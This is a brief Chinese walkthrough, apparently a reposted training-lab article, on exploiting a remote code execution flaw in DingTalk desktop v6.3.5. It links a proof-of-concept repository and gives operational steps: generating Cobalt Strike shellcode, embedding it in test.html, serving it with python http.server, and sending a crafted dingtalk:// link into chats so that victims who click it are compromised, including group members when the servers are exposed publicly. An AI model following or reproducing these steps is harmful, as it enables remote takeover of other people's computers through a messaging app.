本文作者:Taoing(Web漏洞挖掘班讲师)
项目地址:https://github.com/crazy0x70/dingtalk-RCE
本次测试环境:
钉钉:DingTalk_v6.3.5.11308701
下载地址:https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe
CS:4.4payload为32位c语言
生成32为c语言格式payload
使用编辑器打开payload,将\x修改为0x,注意使用逗号分隔
替换前
替换后
将替换后的shellcode复制到test.html中的shellcode=new Uint8Array部分,注意去掉开头的逗号
替换前
替换后
使用python开一个web服务,将替换后的test.html放入web文件夹
python3 -m http.server 80
将poc发送至聊天窗口
dingtalk://dingtalkclient/page/link?url=ip:port/test.html&pc_slide=true
点击poc即可上线,发到群里别人点需要cs和web服务部署到公网,同时非安全版本钉钉才能上线
— 实验室旗下直播培训课程 —
来和20000+位同学加入MS08067一起学习吧!
文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247504439&idx=1&sn=6b448eeaace310d9c8c6d0d4a976ef62&chksm=fc3c6b36cb4be22067c58dbc51c0aa126ae8f498dce48b45c07afafb8d960cb213b66ed97e3d#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh